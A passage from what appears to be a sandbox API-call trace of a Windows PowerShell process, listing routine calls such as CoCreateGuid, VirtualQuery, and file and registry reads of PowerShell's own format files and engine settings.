[2]=0xd, [3]=0xfa, [4]=0xce, [5]=0x3d, [6]=0x93, [7]=0xc1))) returned 0x0 [0073.925] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x7fe)) returned 0x30 [0073.925] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xc66c7e2e, Data2=0x1d42, Data3=0x46ef, Data4=([0]=0x9f, [1]=0x36, [2]=0xb2, [3]=0x9d, [4]=0xdc, [5]=0x63, [6]=0xb, [7]=0x15))) returned 0x0 [0073.925] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x7fe)) returned 0x30 [0073.926] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.926] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xac9c7d70, Data2=0x4142, Data3=0x411d, Data4=([0]=0x87, [1]=0x78, [2]=0x98, [3]=0xf0, [4]=0x3e, [5]=0x3f, [6]=0xe5, [7]=0x4f))) returned 0x0 [0073.927] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x75bb3837, Data2=0x62bb, Data3=0x4eff, Data4=([0]=0x99, [1]=0x38, [2]=0xf7, [3]=0x0, [4]=0x91, [5]=0x9b, [6]=0x4d, [7]=0x9c))) returned 0x0 [0073.927] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xf2c990de, Data2=0x2f71, Data3=0x4c2e, Data4=([0]=0x98, [1]=0xed, [2]=0xa8, [3]=0x96, [4]=0x99, [5]=0x88, [6]=0x52, [7]=0x73))) returned 0x0 [0073.927] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x8864df62, Data2=0xa55f, Data3=0x4f05, Data4=([0]=0xbb, [1]=0xbb, [2]=0x3e, [3]=0xb3, [4]=0xa4, [5]=0xae, [6]=0xcd, [7]=0xf2))) returned 0x0 [0073.928] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.928] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xe53beef7, Data2=0x35a1, Data3=0x4da5, Data4=([0]=0xbb, [1]=0x4a, [2]=0xec, [3]=0xf3, [4]=0xab, [5]=0x8d, [6]=0x9a, [7]=0x37))) returned 0x0 [0073.928] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.929] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.929] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.930] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.930] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.931] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xb4c5b65b, Data2=0xa805, Data3=0x44d7, Data4=([0]=0x9b, [1]=0x46, [2]=0xaa, [3]=0x8b, [4]=0xa0, [5]=0xec, [6]=0x66, [7]=0xe6))) returned 0x0 [0073.931] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x898d2298, Data2=0x8e25, Data3=0x416b, Data4=([0]=0x9f, [1]=0xc7, [2]=0x3c, [3]=0x26, [4]=0xbe, [5]=0x9d, [6]=0xf, [7]=0x36))) returned 0x0 [0073.932] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xebdcc59c, Data2=0x4fea, Data3=0x48f6, Data4=([0]=0xa6, [1]=0xd5, [2]=0x4c, [3]=0x7, [4]=0x86, [5]=0x5, [6]=0x5a, [7]=0xba))) returned 0x0 [0073.932] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x93051703, Data2=0xa7fd, Data3=0x435d, Data4=([0]=0x9e, [1]=0xa7, [2]=0xbe, [3]=0x93, [4]=0xac, [5]=0x27, [6]=0x43, [7]=0xf5))) returned 0x0 [0073.932] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xa7ca816c, Data2=0xa23c, Data3=0x4a67, Data4=([0]=0x87, [1]=0x5f, [2]=0x71, [3]=0x1f, [4]=0xc1, [5]=0x10, [6]=0xa1, [7]=0xd4))) returned 0x0 [0073.933] VirtualQuery (in: lpAddress=0x1ac020, lpBuffer=0x1acee0, dwLength=0x30 | out: lpBuffer=0x1acee0*(BaseAddress=0x1ac000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.933] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x8f4f5404, Data2=0x1b39, Data3=0x482d, Data4=([0]=0xa3, [1]=0xc8, [2]=0xc9, [3]=0xf, [4]=0x62, [5]=0x8a, [6]=0x90, [7]=0xb9))) returned 0x0 [0073.933] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x1a5c8f15, Data2=0x7355, Data3=0x4ff7, Data4=([0]=0xb7, [1]=0x6, [2]=0x90, [3]=0x38, [4]=0x78, [5]=0x9e, [6]=0xbd, [7]=0x77))) returned 0x0 [0073.934] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x6c71e3f8, Data2=0x64b3, Data3=0x47e0, Data4=([0]=0xaa, [1]=0xb0, [2]=0xad, [3]=0x4b, [4]=0x66, [5]=0x13, [6]=0xdf, [7]=0x8c))) returned 0x0 [0073.934] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x65fa6c2f, Data2=0x529d, Data3=0x4eaf, Data4=([0]=0xb4, [1]=0xdc, [2]=0xfc, [3]=0xcb, [4]=0xc, [5]=0x39, [6]=0xb4, [7]=0x77))) returned 0x0 [0073.934] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xcf34412a, Data2=0x4ca9, Data3=0x4455, Data4=([0]=0x8e, [1]=0x73, [2]=0x48, [3]=0x34, [4]=0xde, [5]=0xb, [6]=0xb5, [7]=0x74))) returned 0x0 [0073.935] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x218e3817, Data2=0x56ce, Data3=0x4af0, Data4=([0]=0xbd, [1]=0x1f, [2]=0x11, [3]=0xd5, [4]=0x57, [5]=0x53, [6]=0x6f, [7]=0xd7))) returned 0x0 [0073.935] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xc5bd431c, Data2=0xce3e, Data3=0x4b97, Data4=([0]=0x83, [1]=0xbf, [2]=0x42, [3]=0x35, [4]=0x9f, [5]=0x41, [6]=0xc3, [7]=0xd9))) returned 0x0 [0073.935] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x61119a56, Data2=0x6354, Data3=0x404b, Data4=([0]=0xbe, [1]=0x94, [2]=0x7a, [3]=0xa0, [4]=0x90, [5]=0xb, [6]=0x6c, [7]=0xca))) returned 0x0 [0073.936] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x896a42ea, Data2=0xb25b, Data3=0x4851, Data4=([0]=0xb7, [1]=0xd9, [2]=0x24, [3]=0x9e, [4]=0xc4, [5]=0xc5, [6]=0x10, [7]=0xf3))) returned 0x0 [0073.936] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xf7242c0a, Data2=0x173e, Data3=0x4a5d, Data4=([0]=0xa3, [1]=0x16, [2]=0x22, [3]=0x5b, [4]=0x6c, [5]=0x93, [6]=0x16, [7]=0x31))) returned 0x0 [0073.936] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xcf9c7e78, Data2=0x43c6, Data3=0x4816, Data4=([0]=0xb5, [1]=0xe0, [2]=0x29, [3]=0xe7, [4]=0xc, [5]=0xe1, [6]=0x75, [7]=0x3e))) returned 0x0 [0073.936] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x1ced529, Data2=0xa726, Data3=0x4a56, Data4=([0]=0x8d, [1]=0x56, [2]=0x15, [3]=0x14, [4]=0x91, [5]=0x74, [6]=0x3d, [7]=0x5c))) returned 0x0 [0073.937] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x76c6c675, Data2=0xceed, Data3=0x4da4, Data4=([0]=0xac, [1]=0x7a, [2]=0xdf, [3]=0xc4, [4]=0xf9, [5]=0xea, [6]=0x41, [7]=0xa9))) returned 0x0 [0073.937] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x52555155, Data2=0x6c93, Data3=0x421b, Data4=([0]=0x94, [1]=0xfb, [2]=0x5e, [3]=0x68, [4]=0x61, [5]=0xb5, [6]=0x8e, [7]=0x51))) returned 0x0 [0073.937] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xe55bdad7, Data2=0x5d47, Data3=0x450b, Data4=([0]=0x8c, [1]=0xe6, [2]=0xe, [3]=0xa6, [4]=0x86, [5]=0xb3, [6]=0x44, [7]=0x8f))) returned 0x0 [0073.937] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x7b4810b9, Data2=0x8f02, Data3=0x4e1a, Data4=([0]=0x84, [1]=0x12, [2]=0x12, [3]=0x97, [4]=0x5e, [5]=0x74, [6]=0x12, [7]=0x3c))) returned 0x0 [0073.938] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xaa320816, Data2=0x5cab, Data3=0x4bfa, Data4=([0]=0x91, [1]=0x3, [2]=0x3d, [3]=0xf7, [4]=0xb, [5]=0x7f, [6]=0x97, [7]=0x72))) returned 0x0 [0073.938] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x1b31b000, Data2=0xbe5e, Data3=0x41e0, Data4=([0]=0xb8, [1]=0x4, [2]=0xaa, [3]=0x6b, [4]=0x30, [5]=0x3b, [6]=0xa, [7]=0x61))) returned 0x0 [0073.938] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xec3b55b, Data2=0x45cf, Data3=0x4b95, Data4=([0]=0xa9, [1]=0xe7, [2]=0xf3, [3]=0xca, [4]=0xa, [5]=0xbf, [6]=0x11, [7]=0x8b))) returned 0x0 [0073.939] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.939] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.939] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.940] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x1078769c, Data2=0x9363, Data3=0x469a, Data4=([0]=0x93, [1]=0x1a, [2]=0x63, [3]=0x2d, [4]=0xe5, [5]=0xd9, [6]=0xca, [7]=0x3d))) returned 0x0 [0073.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0073.941] SetErrorMode (uMode=0x1) returned 0x1 [0073.941] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318 [0073.941] GetFileType (hFile=0x318) returned 0x1 [0073.941] SetErrorMode (uMode=0x1) returned 0x1 [0073.941] GetFileType (hFile=0x318) returned 0x1 [0073.941] ReadFile (in: hFile=0x318, lpBuffer=0x3637198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3637198*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.943] ReadFile (in: hFile=0x318, lpBuffer=0x3637198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3637198*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.943] ReadFile (in: hFile=0x318, lpBuffer=0x3637198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3637198*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.943] ReadFile (in: hFile=0x318, lpBuffer=0x3637198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3637198*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.944] ReadFile (in: hFile=0x318, lpBuffer=0x3637198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3637198*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.944] ReadFile (in: hFile=0x318, lpBuffer=0x3637198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3637198*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.945] ReadFile (in: hFile=0x318, lpBuffer=0x3637198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3637198*, lpNumberOfBytesRead=0x1ad0f8*=0x119, lpOverlapped=0x0) returned 1 [0073.945] ReadFile (in: hFile=0x318, lpBuffer=0x3637198, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3637198*, lpNumberOfBytesRead=0x1ad0f8*=0x0, lpOverlapped=0x0) returned 1 [0073.945] CloseHandle (hObject=0x318) returned 1 [0073.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ace40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0073.945] SetErrorMode (uMode=0x1) returned 0x1 [0073.945] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ad0a0 | out: lpFileInformation=0x1ad0a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0073.945] SetErrorMode (uMode=0x1) returned 0x1 [0073.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0073.945] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ad188 | out: phkResult=0x1ad188*=0x318) returned 0x0 [0073.946] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad10c, lpData=0x0, lpcbData=0x1ad108*=0x0 | out: lpType=0x1ad10c*=0x1, lpData=0x0, lpcbData=0x1ad108*=0x56) returned 0x0 [0073.946] CoTaskMemAlloc (cb=0x5a) returned 0x1b3cd000 [0073.946] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ad0dc, lpData=0x1b3cd000, lpcbData=0x1ad0d8*=0x56 | out: lpType=0x1ad0dc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ad0d8*=0x56) returned 0x0 [0073.946] CoTaskMemFree (pv=0x1b3cd000) [0073.946] RegCloseKey (hKey=0x318) returned 0x0 [0073.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0073.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0073.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.948] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0073.948] VirtualQuery (in: lpAddress=0x1abc20, lpBuffer=0x1acae0, dwLength=0x30 | out: lpBuffer=0x1acae0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.948] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0xe7dfaee2, Data2=0x5ce5, Data3=0x488d, Data4=([0]=0x96, [1]=0x40, [2]=0xfd, [3]=0x1f, [4]=0x75, [5]=0xbe, [6]=0x96, [7]=0xe2))) returned 0x0 [0073.948] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.948] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x8fd06191, Data2=0x8916, Data3=0x499e, Data4=([0]=0x96, [1]=0xed, [2]=0xe, [3]=0x1e, [4]=0xe, [5]=0xa0, [6]=0xab, [7]=0x58))) returned 0x0 [0073.949] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x70c271a8, Data2=0x6cc5, Data3=0x4733, Data4=([0]=0xaf, [1]=0xb0, [2]=0x1a, [3]=0x10, [4]=0x88, [5]=0x70, [6]=0x77, [7]=0xf8))) returned 0x0 [0073.949] CoCreateGuid (in: pguid=0x1ad3b0 | out: pguid=0x1ad3b0*(Data1=0x897b2131, Data2=0x29eb, Data3=0x4898, Data4=([0]=0xb8, [1]=0x45, [2]=0xfa, [3]=0xd6, [4]=0xd5, [5]=0x9a, [6]=0x1c, [7]=0x4d))) returned 0x0 [0073.949] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.949] VirtualQuery (in: lpAddress=0x1abd60, lpBuffer=0x1acc20, dwLength=0x30 | out: lpBuffer=0x1acc20*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0073.949] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1acb70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0073.949] SetErrorMode (uMode=0x1) returned 0x1 [0073.950] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318 [0073.950] GetFileType (hFile=0x318) returned 0x1 [0073.950] SetErrorMode (uMode=0x1) returned 0x1 [0073.950] GetFileType (hFile=0x318) returned 0x1 [0073.950] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.951] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.952] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.952] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.953] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.953] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.953] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.954] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.955] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.955] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.955] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.955] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, lpOverlapped=0x0) returned 1 [0073.956] ReadFile (in: hFile=0x318, lpBuffer=0x3693338, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ad0f8, lpOverlapped=0x0 | out: lpBuffer=0x3693338*, lpNumberOfBytesRead=0x1ad0f8*=0x1000, 